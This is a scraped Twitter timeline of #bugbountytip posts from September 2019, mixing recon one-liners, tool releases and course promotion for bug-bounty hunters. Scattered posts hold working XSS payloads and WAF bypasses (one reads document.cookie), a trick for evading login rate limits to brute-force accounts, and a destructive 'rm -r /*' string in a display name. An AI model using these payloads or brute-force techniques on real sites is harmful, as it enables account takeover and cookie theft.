1 Try parammeter polution. Get array in output :) redacted\.com/something/?par1=aaa&par1=bbb Response: ["aaa", "bbb"] Got nothing better this :( No sqli No xss No ssti No error for :( #bugbountytips #bugbountytip
Youssef Lahouifi
@YLahouifi


2019-09-30 17:30:26
0 directory brute forcing hosts recursively in one line of code : cat alivehosts.txt | xargs -n1 -I{} bash -c "cat wordlist.txt | xargs -n1 -I[] curl -s -o /dev/null -w '%{http_code} {}/[]\n' {}/[]" ps: you can use -P option for parallel processing #reconnaissance #bugbountytip
Andri Wahyudi đŸ•Šïž ‏
@andripwn


2019-09-30 14:53:59
0 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/oe5VBCcNOK #bugbounty #xss #bugbountytip #bugbountytips #hackerone
Andri Wahyudi đŸ•Šïž ‏
@andripwn


2019-09-30 14:05:04
1 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/0cMQH7RvaS #BugBounty #bugbountytip #bugbountytips
Securisec 🚀
@securisec


2019-09-30 13:51:32
1 "RT RT Madrobot_: I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd Hacker0x01 Bugcrowd https://t.co/jEDTMNgs8B"
Manoj Kumar
@mkmaddyshock


2019-09-30 12:56:30
0 @amazon I know you people have private bug bounty where you guys pay well.. Why dont you do the same in public too.. We too deserve a token of appreciation... #BugBounty #bugbountytips #BugBountyTip #bugbountytip https://t.co/Oj7fjHaCNJ
Ashish Kunwar
@D0rkerDevil


2019-09-30 10:34:35
3 #bugbountytip do UDP scan and if you found port 500 then run ike-probe to see if its vulnerable to Shared Secret Hash Leakage Weakness, then it will be easily exploitable. ;) #bugbounty #security
Arif Emre Demir
@onerror_xss


2019-09-30 10:32:44
0 Best xss cheatsheet in the world. Thx @Burp_Suite <3 https://t.co/emSf0IMzLa #bugbounty #bugbountytip #xss
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 09:52:16
0 Give your Career A Boost with 🏆🏆 C|EH Certification 🏆🏆 Join HackDoor for Getting C|EH Certified Today !! 💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/QiL5AGygD8
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 09:50:13
0 Bug Hunter ToolKit 💰💰 Comment If Your Favourite Tool is Missing ! 💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/EBE0h6JiEB
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 09:48:13
0 HIT LIKE IF U AGREE !!!! #WindowsUpdate Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Lrp1bwXLIV
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 09:46:40
0 BUG HUNTER$ 💰💰💰💰💰 HIT LIKE IF U AGREE !!!! Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/rIOXTReuFD
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 09:45:01
1 BUG HUNTER$ 💰💰💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/yk9LKNVjtc
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-30 09:42:37
1 Best Search Engine For BUG HUNTER$ Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/DLFN6OzI84
hyperdummy
@dummyclout


2019-09-30 02:03:02
0 #bugbountytip: sometimes you can use the sanitizer’s behavior to get around a waf - sanitizer removes anything like <this> - waf blacklists anything like onerror/alert solution: on<x>error=al<x>ert(1) gets past the waf and the sanitizer returns onerror=alert(1)
SaN ThâœȘsH
@Madrobot_


2019-09-29 20:45:20
1 I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd @Hacker0x01 @Bugcrowd https://t.co/yX1eputSKj
ghostlulz
@ghostlulz1337


2019-09-29 19:06:47
4 So you think getting RCE is hard and just for those uber l33t hackers, its not, just look for exposed Docker APIs. Easy wins. More information on my blog: https://t.co/NUnZhChfJt #infosec #bugbountytips #pentest #redteam #docker #bugbountytip #BugBounty https://t.co/TJKcHswxoo
sagar yadav
@sagaryadav8742


2019-09-29 18:09:35
0 Finally month end with a small bounty 😄 Happy to #secure https://t.co/tVIlKKSeoq #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/ZgCtVXfiMT
ghostlulz
@ghostlulz1337


2019-09-29 17:55:09
1 Some of my favorite things to look for in bug bounties are misconfigurations. A simple setting/config change can reck an entire company. You can apply a patch to fix a CVE but for misconfigurations there generally is no patch to fix it. #bugbountytips #bugbountytip #infosec
Nikos Gkogkos
@ngkogkos


2019-09-29 16:48:10
0 Love the feeling of @albinowax's Turbo Intruder when brute-forcing endpoints. First I run small fuzzing, then I customise the python code for more granular fuzzing. If you are not using it, you are missing. #bugbountytip #BugBounty https://t.co/TNax1ftAYF
baluzđŸ”„
@haknfuk


2019-09-29 13:41:46
0 This was sick..........ey u suckers.. I got an really weird idor ........in googles product writeup coming soon .............................! #bugbounty #bugbountytip #googlevrp #vrp
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-29 07:32:25
0 Give your Career A Boost with 🏆🏆 C|EH Certification 🏆🏆 Join HackDoor for Getting C|EH Certified Today !! 💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/bGmyRodDCR
Eduard Tolosa
@Edu4rdSHL


2019-09-29 02:32:54
3 Tool for subdomains monitoring of your #BugBounty or #pentesting targets? Findomain 0.4.0 is out! Now Findomain can tell you where is a new subdomain for a specific target or a list of targets. See https://t.co/T18VChCGrT #bugbountytip #monitoring #subdomains #hacking #OSINT
Anonymous Worldwide
@AnonsWorldwide


2019-09-29 01:13:05
8 As it gets harder economically to get by for most of us you can make an income if you are into technology. Register these bounty programs to report a bug. These top 30 #BugBounty programs are definitely worth checking out: https://t.co/TGVOzUAMLX #Hacknews #bugbountytip https://t.co/mga4ebFVlj
Berk Bulan
@berk_bulan


2019-09-29 00:08:29
0 Best Practice Labs ------------------------------ BWAPP Webgoat Rootme OWASP Juicy Shop Hacker101 Hacksplaining Penetration Testing Practice Labs Damn Vulnerable iOS App (DVIA) Mutillidae Trytohack HackTheBox SQL Injection Practice #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-29 00:04:16
2 Some Books for reading about Bug Hunting 1) The web application hackers handbook finding and exploiting security flaws -ed2 2011 2) OTGv4 3) Web Hacking 101 4) Breaking into infosec #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-28 23:57:56
0 Good resource for beginner bug bounty hunters ;) #bugbountytips #bugbountytip #BugBounty https://t.co/giIArFJMZ6
baluzđŸ”„
@haknfuk


2019-09-28 11:53:11
1 Some useful twitter Dorks...! #bugbountytip csrf - returns all tweets that include csrf term #bugbounty swag - returns all programs that gives swag #bugbountytips ssrf - returns all tweets regarding ssrf #bugbountytip graph api - returns all about garap
https://t.co/fdiaE2eJtv
Sanketh Sharath
@sharathsanketh


2019-09-28 10:49:20
0 From knowing absolutely nothing in web hacking to my 1st bounty this month, the journey has been arduous yet exciting! https://t.co/X5ed6r0dIR #bugbounty #bugbountytips #bugbountytip
A hacker's life
@Unknownuser1806


2019-09-28 02:35:31
1 Resources-for-Beginner-Bug-Bounty-Hunters https://t.co/GvowSG82JJ #bugbounty,#hacking,#bugbountytip
Dwiki Kusuma
@malexplore


2019-09-27 23:35:51
0 Don't get me wrong, I just want to be polite 😂 #bugbountytips #bugbountytip #synack https://t.co/QKFrSrOtvG
mahendra purbia
@mahendrapurbia7


2019-09-27 20:09:00
1 🔰HOF🔰 & appreciation letter given by https://t.co/yeySsQb8h5 Happy to secure. #bugbountytip #bugbounty #bugbcrowd #openbugbounty #cybersecurity https://t.co/rm20i8LPak
bugbountytip
@a_l_e_r_t_1_


2019-09-27 14:57:24
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
ΛяĐČєη
@spenkkkkk


2019-09-27 12:39:03
0 curl https://t.co/ptThqLAUu1 --silent | grep Disallow | awk '{print $2}' #bugbountytip #oneliner
Çlirim Emini
@0xcela


2019-09-27 11:44:57
0 import time #bugbountytip #bugbountytips
Milind Purswani
@MilindPurswani


2019-09-27 07:01:44
0 Never ever ever ever ever do recon without tmux. Trust me, its a life saver. #bugbountytip
baluz
@haknfuk


2019-09-27 03:47:10
0 If your struggling with exploiting xss and bypassing filters..... Remember he is there @spyerror #bugbountytip
ghostlulz
@ghostlulz1337


2019-09-27 02:48:33
2 Yet another Elastic search database with thousands of clear text credentials. If your not looking for these on your bug bounties your missing out on easy wins. More info on my blog https://t.co/kqwIe5WNwy #BugBounty #BugBountyTip #infosec #elasticsearch #redteam #bugbountytips https://t.co/1FrEIz8kHp
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-09-26 21:17:34
0 @teamsnap Reported Vulnerability under your Responsible Disclosure Program - You fixed vulnerability without any acknowledgement or reward !! A good lesson for all #BugHunters ! #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-09-26 19:02:52
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CsKRe #BugBountyTip #xss #xxe #sqli #ssrf #ce
bugbountymemes
@bugbounty_memes


2019-09-26 17:16:19
1 i was rewarded 4 times $1,000 bounty -> Bypass 429. 1. found expired domain. 2. found login form with 429 protection after some attempts. 3. replace the domain with expired domain. 4. start bruteforce. Now you don't have 429 too many requests #bugbountytip #bugbounty
Muhab Alhadi
@MuhabAlhadi


2019-09-26 14:48:50
0 Burp suite is a beast, but Owasp ZAP does the job when you're Broke 😁 I really like it's Hidden directory feature, the Tool is solid #owaspZAP #bugbountytip
Un4gi
@Un4gi1


2019-09-26 13:25:27
0 Apparently uploading an malicious executable file or pdf, etc. is a “feature”. No support employee would ever open an attachment without heavy social engineering.. 🙄 I‘m starting to hate @Hacker0x01 managed programs more and more every day... #bugbountytip https://t.co/PslGB8W1Ad
Henry Chen
@chybeta


2019-09-26 11:25:54
1 my personal monitor system alerts me to update Jenkins,Joomla,Spring and Jira Jenkins: https://t.co/3QLlyzxZcb Joomla: https://t.co/PHiJqZqEgr Spring: https://t.co/1QePyPw7DF Jira: https://t.co/hTyIUVC9yC #bugbounty #bugbountytip #bugbountytips https://t.co/u9gxcgC2vh
intigriti
@intigriti


2019-09-26 11:11:37
10 Testing a Ruby on Rails app? Add .json to the URL and see what happens! 😏 Thanks for the #BugBountyTip, @yaworsk! 🙌 https://t.co/oHlHilQtr7
bugbountytip
@a_l_e_r_t_1_


2019-09-26 08:49:02
0 Less than 1$đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Matt Palmer
@mattpalmer_au


2019-09-26 08:29:07
0 When doing masses amount of recon on a program with a large scope, how does everyone keep motivated? #bugbountytip #bugbountytips
A hacker's life
@Unknownuser1806


2019-09-26 08:12:14
1 This tool simply iterates over hosts on port 443 and 80 and runs a PoC to test if they are vulnerable to RCE. You can use Shodan to gather potential targets: https://t.co/svK0gwpuRk #bugbounty, #bugbountytip, #hacking
Somdev Sangwan
@s0md3v


2019-09-26 05:52:22
0 This tweet didn't get enough reach, should I add #bugbountytip?
Sandeep Kamble
@SandeepL337


2019-09-26 04:36:41
0 Hey H4x0r, create as many as possible accounts. Try to hijack other accounts using bruteforce, automated bots or any vulnerabilities. https://t.co/Zk48BocHuE Enjoy !!! DM me results and get the cool swag from @SecureLayer7. #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-09-26 03:28:31
6 Findomain 0.3.0 is out! * Added support to work only with resolved subdomains. * Added support for writing to custom output unique file (still when reading domains from file). * A lot of code improvements. https://t.co/qay2bKyJ5K #bugbounty #subdomains #bugbountytip #tools
FS
@fsec__


2019-09-26 02:51:41
0 Bug bounty bazaar and contest! https://t.co/AYxkrwAoXK https://t.co/9eeeKg3lm9 #BugBounty #bugbountytip #bugbountytips
ak1t4 đŸ‡ŠđŸ‡·
@akita_zen


2019-09-25 23:31:48
0 @hakluke @TomNomNom #bugbountytip: For a quick vim exit, use nano.
A hacker's life
@Unknownuser1806


2019-09-25 22:34:44
0 Using URI to pop shells via the Discord Client https://t.co/xtT8DuW0ei #bugbountytip ,#bugbounty ,#hacking
bugbountytip
@a_l_e_r_t_1_


2019-09-25 21:47:44
0 Less than 1$ no ads ❌đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Security Executions Code
@pwn0sec


2019-09-25 20:01:08
0 Find (XSS) Vulnerabilities with (𝐗𝐒𝐒)-𝐋𝐚𝐛𝐬 [Tutorial] https://t.co/IfpKUm1Azs #bugbounty #bugbountytip #bugbountytips #xss
Andri Wahyudi đŸ•Šïž ‏
@andripwn


2019-09-25 18:36:42
0 Web App Penetration Testing - Recon Part #6 https://t.co/bPJkQbIgDZ #BugBounty #bugbountytips #bugbountytip #hackerone
m0z
@LooseSecurity


2019-09-25 17:44:02
2 The secret to a good bug bounty career is approaching payment like you would luck. If you get it, you're happy, if not then that's just how life is. There is no point complaining, pay it forward and being a nice guy will pay off in the end. #BugBounty #bugbountytips #bugbountytip
Fisher
@Regala_


2019-09-25 17:25:04
0 Valid within and outside bb, never hole yourself up in your own opinion bubble 🙏 #bugbountytip https://t.co/MFeVw0xllI
bugbountytip
@a_l_e_r_t_1_


2019-09-25 15:00:50
0 Less than 1$ no ads ❌đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Bugploit
@bugploit


2019-09-25 08:10:23
0 Bad luck again 🙃! #bugbounty #bugbountytip #bugbountytip https://t.co/nyCKPRRlwL
expl0itc0der
@vanshitmalhotra


2019-09-25 05:59:13
0 Abusing VPC Traffic Mirroring in AWS : Deploying a Malicious Mirror with Compromised AWS Credentials : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/7oTKO87uT4
expl0itc0der
@vanshitmalhotra


2019-09-25 05:55:16
1 pure bash bible : A collection of pure bash alternatives to external processes : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/WFrwiofDPJ
expl0itc0der
@vanshitmalhotra


2019-09-25 05:53:43
0 navi : An interactive cheatsheet tool for the command-line : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/wW8DAqxakm
expl0itc0der
@vanshitmalhotra


2019-09-25 05:52:28
0 gitGraber : Monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Mailgun, Facebook, Twitter, Heroku, Stripe : #BugBounty #BugBountyTip #penetrationtesting #pentesting #devsecops https://t.co/d3uSf6oV3X
expl0itc0der
@vanshitmalhotra


2019-09-25 05:48:20
0 [Bug Bounty] Exploiting Cookie Based XSS by Finding RCE #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/C6BWshUbE6
Yusuf Yazir
@Hacklad


2019-09-25 04:34:48
0 @moodiAbdoul Glad to hear that bud. Search on Twitter "#bugbountytip ato" or "#bugbountytip takeover" that's my #bugbountytip đŸ’Ș Do it ✔
Shubham Sharma
@Shubham_pen


2019-09-25 03:24:49
0 Banner grabbing is a process to collect details regarding any remote PC on a network and the services running on its open ports. @rajchandel @kalilinux @ubuntu @nmap #RedTeam #CyberSecurity #infosec #bugbountytip #Pentesting #CTF #OSCP #GodMorningWednesday https://t.co/bYuLQsIdMA
A hacker's life
@Unknownuser1806


2019-09-25 02:35:02
0 “The journey of Web Cache + Firewall Bypass to SSRF to AWS Credentials compromise!” by Avinash Jain (@logicbomb_1) https://t.co/dMNo89RrZN #bugbounty,#bugbountytip ,#hacking
ICO scams & etc
@Scams_Alarm


2019-09-24 21:17:17
0 #Telegram just launched a competition to fix it's #blockchain. #TON issues on GitHub are rising, no documentation🙈. After raising 1.5 billion$+ 💾 Contest 💎https://t.co/P1q9EigN7x $TON GitHub 💎https://t.co/cisSF9zhQk #bugcontest #bugbountytip #crypto #ico # https://t.co/CuPhJbjw8Z
A hacker's life
@Unknownuser1806


2019-09-24 19:56:17
0 “#BugBounty — ‘Journey from LFI to RCE!!!’-How” by Avinash Jain (@logicbomb_1) https://t.co/pnUI6Xmrdk #bugbountytip,#hacking,#programming
Murdockz
@Murdockz_CEH


2019-09-24 19:26:58
0 Finally wrote a script to git pull all my BB tools. Long overdue. check it out https://t.co/iv6PfCd2pN #bugbounty #bugbountytips #bugbountytip
Arif Khan
@payloadartist


2019-09-24 15:24:51
0 This is really something one should try out. It eases out your recon to a great extent. #bugbounty #infosec #bugbountytip https://t.co/iJxu1Y09hf
A hacker's life
@Unknownuser1806


2019-09-24 09:41:16
0 aquatone results for sites with bug bountys Raise an issue if you want a fresh scan or a new domain to be checked https://t.co/o2na3KQISM #bugbounty,#hacking,#bugbountytip
David Haigh
@BugDevilDavid


2019-09-24 08:56:20
0 There is a bug in iOS 13 where you can’t turn off HomePod alarms which is really weird @apple are you going to fix this? #homepod #tech #bug #bughead #softwaretesting #software #ios #ios13 #homekit #major #wtf #apple @theapplehub @AppleSupport #bugbountytip #testing https://t.co/6p8nvNrGI0
Vulkey_Chen
@Vulkey_Chen


2019-09-24 08:28:26
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/KmowGjUxcA
Rapid Safeguard
@RapidSafeguard


2019-09-24 05:34:25
0 https://t.co/XzCLxBUQXt Counter strike Global offensive that allows a remote attacker to execute remote code without the users permission. #CounterStrikeGlobalOffensive #infosec #vulnerability #Bugs #bugbountytip https://t.co/HmkCj1cKHs
bugbountytip
@a_l_e_r_t_1_


2019-09-24 04:39:10
0 Less than 1$ no ads ❌đŸ’Ș👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
𝙿𝚘𝚖𝚎𝚐𝚛𝚊𝚗𝚊𝚝𝚎 🌮
@ret2pomegranate


2019-09-24 02:28:53
0 Has anyone been paid by @ATT Bug Bounty Program? If so what is the expectancy waiting time till bounty or how long did it take to bounty & resolve? #BugBountyTip #infosec #ATT #bugbounty #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-09-23 20:06:17
0 Just 1$ https://t.co/JPaA4CKmfO #bugbountytip #bugbounties
Abss
@abss_tbh


2019-09-23 17:54:04
0 Get your targets IP ranges using your targets domain (asn+cidr extract): a=$(curl -H'Accept: application/json' https://t.co/NGktlz9hSE$(dig +short $domain | head -1)| jq .as_number);echo '!gas'$a''| nc https://t.co/iLNKnnj93I 43 | tr " " "\n" | sed -e '1d' -e '$d' #BugBountyTip https://t.co/YzNOF6r1bD
Kenan
@h1_kenan


2019-09-23 14:47:07
4 one of my bypasses in script context: 1')});x=(document),y=x.cookie;(alert)(y);function r(){a('b bypasses to alert cookie which was restricted, also finishes some function #XSS #WAFbypass #bugbountytip @zseano @brutelogic
intigriti
@intigriti


2019-09-23 13:45:34
16 Open your eyes and see: there is more than S3! 👀 @hussein98d recommends cloud_enum to find unprotected Google Cloud buckets and Microsoft Azure storage accounts! 📩🔓#BugBountyTip 👉 https://t.co/jdufh0L7fR https://t.co/OqRtTIanb5
Anas Mahmood đŸ‡”đŸ‡°
@AnasIsHere


2019-09-23 06:25:43
0 @soaj1664ashar Payload: </script></><script>confirm(document.domain)</script> (The keyword was reflected inside javascript & only angle brackets were unsanitized Only </script> tag allowed & all others were not Able to close the javascript, </> allowed me to inject <script> tag)🙌 #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-09-23 05:52:18
2 Google will pay you $1,000 to hack some of Android’s most popular apps Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/P5Zgaqbfaw
expl0itc0der
@vanshitmalhotra


2019-09-23 05:50:26
0 Google’s bug bounty programs paid out almost $3M in 2017 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops https://t.co/YYTW4ja3WZ
Anas Mahmood đŸ‡”đŸ‡°
@AnasIsHere


2019-09-23 05:46:25
0 @soaj1664ashar Payload: </script></><script>confirm(document.domain)</script> (The keyword was reflected inside script tag & only angle brackets were unsanitized Only </script> tag allowed & all others were not Able to close the script tag, </> allowed me to inject <script> tag)🙌 #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-09-23 05:44:03
3 Facebook expands bug bounty program to include third-party apps and websites Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/JbayjPAGUw
expl0itc0der
@vanshitmalhotra


2019-09-23 05:41:34
0 Google will now pay bigger rewards for discovering Chrome security bugs Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/54qJVMUyN1
Pomegranate 🌮
@ret2pomegranate


2019-09-22 23:48:57
0 Just reported RCE to a program on @Hacker0x01. At first PHP functions like exec(), system() weren’t being executed due to PHP disabling these. Was able to disable the function itself and made system() available again & boom RCE. #bugbounty #BugBountyTip #hackerone #infosec
baluzđŸ”„
@haknfuk


2019-09-22 17:15:22
2 https://t.co/LHR5DiByot free free free #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-09-22 14:54:07
3 Maximise Your Bug Bounty Scope and Payout with #AMASS from $$ OWASP $$ https://t.co/UZCGyJAWXQ Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops
A hacker's life
@Unknownuser1806


2019-09-22 14:29:59
1 This is a collection of writeups, cheat sheets, videos, related to SSRF in one single location https://t.co/DEn6Z8EY5X #SSRF, #bugbounty, #BugBountyTip
hacks2learn
@hacks2learn


2019-09-22 12:55:15
0 For those looking for new ideas... I re-discovered this awesome article today by @Jackson_T and I'm sharing it as it is an excellent resource for learning how to find vulnerabilities https://t.co/1QeTSFfaxl #BugBountyTip 👍
expl0itc0der
@vanshitmalhotra


2019-09-22 12:09:38
1 Looking for Rare SQL Injection Bugs ? Maximise your Bug Bounty Payouts SQL Injection Tutorial - OWASP JuiceShop Hidden Christmas Surprise Challenge 💰💰💰💰 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip https://t.co/N4vjkRujJj
expl0itc0der
@vanshitmalhotra


2019-09-22 12:03:33
0 A5 Broken Access Control Forced Browsing OWASP Juice Shop Tutorial Follow On Facebook $$$ https://t.co/iNczOcGmCt Subscribe on Youtube https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #devsecops #cybersecurity https://t.co/yQ2JhdWzi2
expl0itc0der
@vanshitmalhotra


2019-09-22 11:53:29
2 A6 Directory Listing Security Misconfiguration OWASP Juice Shop Tutorial Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting https://t.co/2gtd4DxOSr
m0z
@LooseSecurity


2019-09-22 10:33:56
3 What languages do you think are the best for hackers? It's a common question, interested to know what others think. In my opinion PHP programmers are very security-aware. Python is good for bug bounty automation. JS is good for advanced XSS payloads/PoCs. #BugBountyTip
OWASP Amass
@owaspamass


2019-09-22 05:28:59
5 OWASP Amass Tip For ASNs: amass intel -org OrgName For domain names: amass intel -active -asn n1,n2 For subdomains and infrastructure: amass enum -src -ip -df domains.txt #osint #recon #assetdiscovery #subdomain #enumeration #bugbounty #bugbountytip https://t.co/QWTftRbJKT
Vulkey_Chen
@Vulkey_Chen


2019-09-22 03:57:34
0 #BugBounty #BugBountyTips #BugBountyTip I build a burpsuite extension to mark sensitive information. e.g. If "mobile phone number" and "email address" information appear in the response content, then mark this request for red color. Open Source Address: https://t.co/zvEFnVh0FK https://t.co/fNN80C1Etz
iamsushi
@sushiwushi2


2019-09-22 02:21:14
0 Here's a #BugBountyTip, if you are lazy like me to manually generate a POST request CSRF POC, consider using this tool https://t.co/tEzQaMmFgB
Securisec 🚀
@securisec


2019-09-21 23:55:24
0 "RT RT vanshitmalhotra: XSS Filter Bypass on https://t.co/bT7rV3brs6 💰💰💰💰💰💰 Filter Bypass to Reflected XSS on https://t.co/z6m1vQwWw1 (mobile version) https://t.co/gJY9DNkfiL #Bugbountytip #xss #yahoo #penetrationtesting #bugbounty #pentesting"
expl0itc0der
@vanshitmalhotra


2019-09-21 22:50:44
0 XSS Filter Bypass on https://t.co/bFnci9AWC2 💰💰💰💰💰💰 Filter Bypass to Reflected XSS on https://t.co/oz7xPDki4P (mobile version) https://t.co/mVUPFSwEL0 #Bugbountytip #xss #yahoo #penetrationtesting #bugbounty #pentesting
expl0itc0der
@vanshitmalhotra


2019-09-21 21:19:49
3 A5 Broken Access Control OWASP Juice Shop Challenge - OWASP Top Ten Tutorial https://t.co/BQlGp02UDf #BugBountyTip #penetesting #penetrationtesting #cybersecurity #devsecops #devops
expl0itc0der
@vanshitmalhotra


2019-09-21 21:15:14
3 A5 Broken Access Control Session Storage OWASP Juice Shop Tutorial OWASP Top Ten Training -- Free #BugBounty Tutorial - 💰💰💰💰 https://t.co/SZmg3HOSP3 #BugBountyTip #penetesting #penetrationtesting #cybersecurity #devsecops #devops
propers[email protected]:~$ sud€ rm -r /*
@IAMPROPERSAM


2019-09-21 20:29:46
0 Web App owners: We are very secured nd safe from #Hackers. đŸ˜čđŸ˜č #bugbounties #BugBountyTip https://t.co/6IeHA0Knpr
A hacker's life
@Unknownuser1806


2019-09-21 19:58:08
1 A list of payloads for any kind of #vulnerability https://t.co/RfVj8bc6A9 #XSS ,#sqli, #ssrf ,#csrf,#rce #bugbounty,#BugBountyTip
GTH / GrandTheftHTTP / Adam Langley
@GrandTheftHTTP


2019-09-21 18:07:06
0 Everyone is always trying to find content on a website. Why don't you look for the absence of content ( aka the 404 page ). 404’s will quite often reflect the page URL that's trying to be accessed which could be prone to an XSS attack #BugBountyTip #hacking #infosec
Dominik Opyd
@neiriru


2019-09-21 17:56:25
0 I recommend reading #bugbounties #Security #Hacking #bugbountytips #BugBountyTip #BugBounty https://t.co/834ItNwAPP
Oad Earth
@oad_earth


2019-09-21 17:42:21
0 Is GitHub OAuth is really safe or is something wrong there? #BugBountyTip #Security #Hacking #BugBounty #bugbountytips #bugbounties https://t.co/ES0GAsnRsg
Sudoka
@sudo_sudoka


2019-09-21 16:41:16
1 Today I learn that we can check an IP whether it is a honeypot or not by using https://t.co/a61WGFzu9Q. Now you can avoid the honeypots and concentrate in real systems. Please comment if you find a honeypot. 🙏 #bugbounty #bugbountytip #threathunting
expl0itc0der
@vanshitmalhotra


2019-09-21 09:32:50
3 Bug Bounty Tutorial - Maximise Your Bug Bounty Output With Simple Nmap Script --- $$$$$ --- Use these Nmap script to automate the searching of CVE for a version of service running on a port scanned using Nmap. #BugBounty #bugBountyTip https://t.co/0gfcgW7uTM
Enciphers
@enciphers_


2019-09-21 07:13:31
4 "Demystifying Frida" On our Youtube Channel: https://t.co/UolayOUxTO Presentation: https://t.co/nX6KhTtdNM #BugBountyTip #cybersecurity #pentest #informationsecurity #cybersec #infosecurity #infosec #BugBounty #androidapp #AppSec #MobileApp #Pentesting #iOS #androidsecurity https://t.co/2E3a1hoelj
BlackClover
@Bc10ver


2019-09-21 07:05:42
0 Top story: @intigriti: '🔍 Looking for XSS? Don't forget the parameter names! 💡Thanks for the #BugBountyTip, @p4fg! #HackWithIntigriti ' https://t.co/3COYJGb6iZ, see more https://t.co/fVnXn9Z0FJ
đŸ‘»in🐚
@0xerror


2019-09-21 07:05:42
0 XSS News: @intigriti: '🔍 Looking for XSS? Don't forget the parameter names! 💡Thanks for the #BugBountyTip, @p4fg! #HackWithIntigriti ' https://t.co/0zBniIXCrE, see more https://t.co/4VACxHYGGn
Rapid Safeguard
@RapidSafeguard


2019-09-21 06:52:52
0 https://t.co/3YHBGnQ3VO Awesome Hacking Resources #hacking #resources #infosec #BugBountyTip
👣
@_sawzeeyy


2019-09-20 22:25:31
1 Don't forget to use that BXSS payload 😉 #BugBounty #BugBountyTip
Murdockz
